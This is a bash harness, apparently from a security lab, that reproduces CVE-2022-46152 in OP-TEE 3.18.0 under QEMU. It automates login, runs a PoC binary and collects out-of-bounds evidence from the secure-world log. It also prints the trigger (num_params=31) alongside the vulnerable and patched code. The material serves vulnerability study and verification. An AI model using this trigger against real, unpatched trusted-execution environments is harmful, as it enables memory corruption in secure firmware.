#!/usr/bin/env bash
# =============================================================================
# exploit.sh — Automated reproduction of CVE-2022-46152 using an expect script
#              to drive QEMU
#
# Usage:
#   ./exploit.sh           # Fully automated run; prints results to stdout
#   ./exploit.sh --manual  # Print manual reproduction steps only
# =============================================================================
set -euo pipefail

# Everything is located relative to the directory holding this script.
# The command substitution is kept on its own assignment line so that a
# failing cd is not masked by readonly's exit status.
SCRIPT_DIR=$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)
readonly SCRIPT_DIR
readonly OPTEE_DIR="${SCRIPT_DIR}/optee"                # OP-TEE tree produced by setup.sh
readonly BINARIES_DIR="${OPTEE_DIR}/out/bin"            # firmware images QEMU boots from
readonly SOC_TERM="${OPTEE_DIR}/build/soc_term.py"      # UART terminal helper (manual mode)
readonly LOG_NW="${SCRIPT_DIR}/normal_world.log"        # Linux console transcript
readonly LOG_SW="${SCRIPT_DIR}/secure_world.log"        # OP-TEE secure UART transcript

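# Print an informational line (blue [INFO] tag) to stdout.
# printf '%s' prints the arguments literally; echo -e would expand backslash
# sequences inside them (e.g. in a path) and mishandle an argument like "-n".
info()    { printf '\033[1;34m[INFO]\033[0m  %s\n' "$*"; }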
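# Print a success line (green [ OK ] tag) to stdout. Not referenced elsewhere
# in this script; kept for parity with info/section. Uses printf so arguments
# are printed literally instead of having backslash escapes expanded by echo -e.
ok()      { printf '\033[1;32m[ OK ]\033[0m  %s\n' "$*"; }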
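# Print a cyan section banner preceded by a blank line.
# Arguments are emitted through %s so they are never interpreted as escapes.
section() { printf '\n\033[1;36m=== %s ===\033[0m\n' "$*"; }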

# --------------------------------------------------------------------------- #
# Manual reproduction steps
# --------------------------------------------------------------------------- #
# Manual mode: print the step-by-step instructions and stop. Any other (or no)
# argument falls through to the automated run below.
case "${1:-}" in
    --manual)
        cat <<'EOF'

========================================
CVE-2022-46152 Manual Reproduction Steps
========================================

1. Start the QEMU environment (three terminal windows):

   # Terminal 1 — Start QEMU:
   ./run_qemu.sh --no-gdb

   # Terminal 2 — Normal World (Linux console):
   python3 optee/build/soc_term.py 54320

   # Terminal 3 — Secure World (OP-TEE secure log):
   python3 optee/build/soc_term.py 54321

2. Wait for both UART terminals to show "listening on port ..." before starting QEMU

3. Wait for the Normal World terminal to show the Linux login prompt, then type:
   (none) login: root

4. Run the PoC in the Linux shell:
   /root/cve_2022_46152

5. Observe the output:
   - Normal World terminal: PoC prints trigger information
   - Secure World terminal: OP-TEE TEE core prints OOB access evidence

========================================
Expected Output (vulnerable OP-TEE 3.18.0)
========================================

Normal World:
  === CVE-2022-46152 PoC Exploit ===
  [+] Opened /dev/tee0
  [+] Session opened: id=1
  [*] Triggering vulnerability: invoking with num_params=31
  [+] VULNERABILITY TRIGGERED!
  [+] TEE returned TEE_ERROR_BAD_PARAMETERS (0xFFFF0006)

Secure World (OP-TEE UART):
  E/TC: entry_std.c:xxx  CVE-2022-46152: OOB! cleanup_shm_refs num_params=31 > TEE_NUM_PARAMS=4

========================================
Vulnerable vs. Fixed Code
========================================

Vulnerable code (3.18.0) core/tee/entry_std.c:
  cleanup_shm_refs(saved_attr, &param, num_params);
  //                                   ^^^^^^^^^^
  // num_params can be 31, but saved_attr[4] only has 4 slots!

Fixed code (3.19.0) commit 728616b:
  cleanup_shm_refs(saved_attr, &param, MIN(TEE_NUM_PARAMS, num_params));
  //                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  // Capped to min(4, 31) = 4; no more out-of-bounds access

EOF
        exit 0
        ;;
esac

# --------------------------------------------------------------------------- #
# Automated reproduction (requires expect)
# --------------------------------------------------------------------------- #
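# The automated path needs expect; without it, re-exec in manual mode so the
# user still gets the reproduction steps.
command -v expect >/dev/null 2>&1 || {
    info "expect not found; use --manual for manual steps"
    exec "$0" --manual
}

# setup.sh produces the firmware images; bl1.bin is the first thing QEMU loads,
# so its absence means the environment was never built. Diagnostics go to
# stderr and name the missing path so the failure is actionable.
[[ -f "${BINARIES_DIR}/bl1.bin" ]] || {
    printf '[!] Environment not built (missing %s). Please run ./setup.sh first\n' \
        "${BINARIES_DIR}/bl1.bin" >&2
    exit 1
}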

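section "Automated reproduction of CVE-2022-46152"

# QEMU built under the OP-TEE tree; the path mirrors the one run_qemu.sh uses.
# The error goes to stderr and names the path that was checked.
QEMU_BIN="${OPTEE_DIR}/qemu/build/aarch64-softmmu/qemu-system-aarch64"
if [[ ! -x "${QEMU_BIN}" ]]; then
    printf '[!] qemu-system-aarch64 not found or not executable: %s\n' "${QEMU_BIN}" >&2
    exit 1
fi
info "Using QEMU: ${QEMU_BIN}"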

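# QEMU is given relative -bios/-kernel/-initrd paths, so run it from the
# binaries directory.
cd "${BINARIES_DIR}" || { printf '[!] cannot cd to %s\n' "${BINARIES_DIR}" >&2; exit 1; }

# Link the Buildroot root filesystem next to the other images. The link itself
# is best-effort (it may already exist), but the files QEMU will load must
# resolve now; otherwise the failure only shows up much later as a boot error
# inside the expect session.
ln -sf "${OPTEE_DIR}/out-br/images/rootfs.cpio.gz" "rootfs.cpio.gz" 2>/dev/null || true
for f in Image rootfs.cpio.gz; do
    [[ -e "${f}" ]] || {
        printf '[!] %s not found in %s; build the environment first (./setup.sh)\n' \
            "${f}" "${BINARIES_DIR}" >&2
        exit 1
    }
done

info "Starting Secure World UART log server (port 54321)..."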

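# Secure World log server: a minimal TCP listener on 127.0.0.1:54321 that copies
# whatever QEMU writes to its second serial port into ${LOG_SW}. soc_term.py is
# not used here because it needs a TTY. The Python source is passed verbatim to
# python3 -c; note it accepts exactly one connection and blocks in accept()
# until QEMU connects.
SW_LOGGER='
import socket, sys
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("127.0.0.1", 54321))
s.listen(1)
print("listening on port 54321", flush=True)
conn, _ = s.accept()
while True:
    d = conn.recv(4096)
    if not d:
        break
    sys.stdout.buffer.write(d)
    sys.stdout.buffer.flush()
'
command -v python3 >/dev/null 2>&1 || {
    printf '[!] python3 is required for the Secure World log server\n' >&2
    exit 1
}
python3 -c "${SW_LOGGER}" > "${LOG_SW}" 2>&1 &
SW_PID=$!

# Make sure the listener does not outlive this script: with set -e, a failure
# later on (e.g. the expect session exiting 1 on a boot timeout) would otherwise
# leave it blocked in accept() on port 54321. Killing an already-exited
# process is harmless, hence the || true.
cleanup_sw_logger() { kill "${SW_PID}" 2>/dev/null || true; }
trap cleanup_sw_logger EXIT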

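# Wait until the Secure World port is in LISTEN state. ss is used rather than a
# probe connection because the server accepts a single client and a probe would
# consume that accept(). The loop is bounded (~30 s) and checks that the server
# is still alive, so a bind failure (port already taken) or a missing Python
# module surfaces as an error instead of an endless spin.
info "Waiting for Secure World port (54321)..."
attempts=0
while :; do
    if ! kill -0 "${SW_PID}" 2>/dev/null; then
        printf '[!] Secure World log server exited early; see %s\n' "${LOG_SW}" >&2
        exit 1
    fi
    if ss -tln 2>/dev/null | grep -q ':54321'; then
        break
    fi
    if (( ++attempts > 60 )); then
        printf '[!] Timed out waiting for port 54321 to listen\n' >&2
        exit 1
    fi
    sleep 0.5
done
# A listener on 54321 is not proof it is ours: if another process holds the
# port, our server dies on bind. Re-check liveness before handing QEMU to it.
if ! kill -0 "${SW_PID}" 2>/dev/null; then
    printf '[!] Port 54321 is in use by another process; see %s\n' "${LOG_SW}" >&2
    exit 1
fi
info "Secure World port ready"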

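info "Starting QEMU, waiting for system boot (~30-60 seconds)..."

# QEMU is spawned directly by expect: the first serial port (-serial stdio) is
# the Linux console, driven through expect's PTY; the second (-serial tcp:...)
# carries the Secure World UART to the log server started above. No soc_term.py
# intermediary is needed, which avoids the EOF problems seen when the PTY master
# fd was inherited across exec.
#
# The heredoc delimiter is quoted so bash performs no expansion inside the Tcl
# script. The two values the script needs are passed through the environment
# and read with $env(...): a QEMU or log path containing spaces, '[' or '$'
# is then handled as a single Tcl word instead of being spliced into Tcl source.
# (Tcl treats the backslash-newline continuations in the spawn command the same
# way bash did when the heredoc was unquoted.)
# On a boot/login timeout the script exits 1, which aborts this script under
# set -e; the EXIT trap installed with the log server cleans up after that.
export QEMU_BIN LOG_NW
expect -f - <<'EXPECT_SCRIPT'
set timeout 180
log_file -noappend $env(LOG_NW)

spawn $env(QEMU_BIN) \
    -display none \
    -serial stdio \
    -serial tcp:localhost:54321 \
    -smp 2 \
    -machine virt,secure=on,mte=off,gic-version=3,virtualization=false \
    -cpu max,sve=off \
    -d unimp \
    -semihosting-config enable=on,target=native \
    -m 1057 \
    -bios bl1.bin \
    -initrd rootfs.cpio.gz \
    -kernel Image \
    -no-acpi \
    -no-reboot \
    -monitor none \
    -append {console=ttyAMA0,38400 keep_bootcon root=/dev/vda2}

expect {
    "login:" { send "root\r" }
    timeout  { puts "\n\[!\] Boot timed out"; exit 1 }
}

expect {
    "# " { send "/root/cve_2022_46152\r" }
    timeout { puts "\n\[!\] Login timed out"; exit 1 }
}

expect {
    "VULNERABILITY TRIGGERED" {
        puts "\n\[+\] Reproduction successful! CVE-2022-46152 triggered"
    }
    "TEE returned TEE_ERROR_BAD_PARAMETERS" {
        puts "\n\[+\] OOB occurred (TEE_ERROR_BAD_PARAMETERS returned)"
    }
    timeout {
        puts "\n\[?\] Timed out; check log $env(LOG_NW)"
    }
}

expect "# "
send "poweroff\r"
# Wait for QEMU to shut down (expect receives eof when the process exits)
expect {
    eof     { puts "\n\[*\] QEMU has shut down" }
    timeout { puts "\n\[*\] Shutdown wait timed out, continuing..." }
}
EXPECT_SCRIPT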

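# Give the Secure World log server a short grace period (~10 s) to exit on its
# own — it ends when QEMU closes the serial connection — then stop it. A plain
# unbounded `wait` could hang this script forever if QEMU never connected or
# never exited (e.g. after the "Shutdown wait timed out" branch above).
for ((i = 0; i < 20; i++)); do
    kill -0 "${SW_PID}" 2>/dev/null || break
    sleep 0.5
done
kill "${SW_PID}" 2>/dev/null || true
wait "${SW_PID}" 2>/dev/null || true

info "Normal World log: ${LOG_NW}"
info "Secure World log: ${LOG_SW}"
printf '\n'
info "Key Secure World log lines (CVE-2022-46152 trigger evidence):"
# -m 20 bounds the output inside grep. Piping into `head -20` would let head
# close the pipe early on a long log; the resulting SIGPIPE in grep trips
# pipefail and prints the "no matches" message right after the matches.
# Separate -e patterns avoid the GNU-only \| alternation in basic regex.
grep -a -m 20 -e 'CVE-2022-46152' -e 'OOB' -e 'E/TC' "${LOG_SW}" \
    || info "(Secure World log is empty or no matches)"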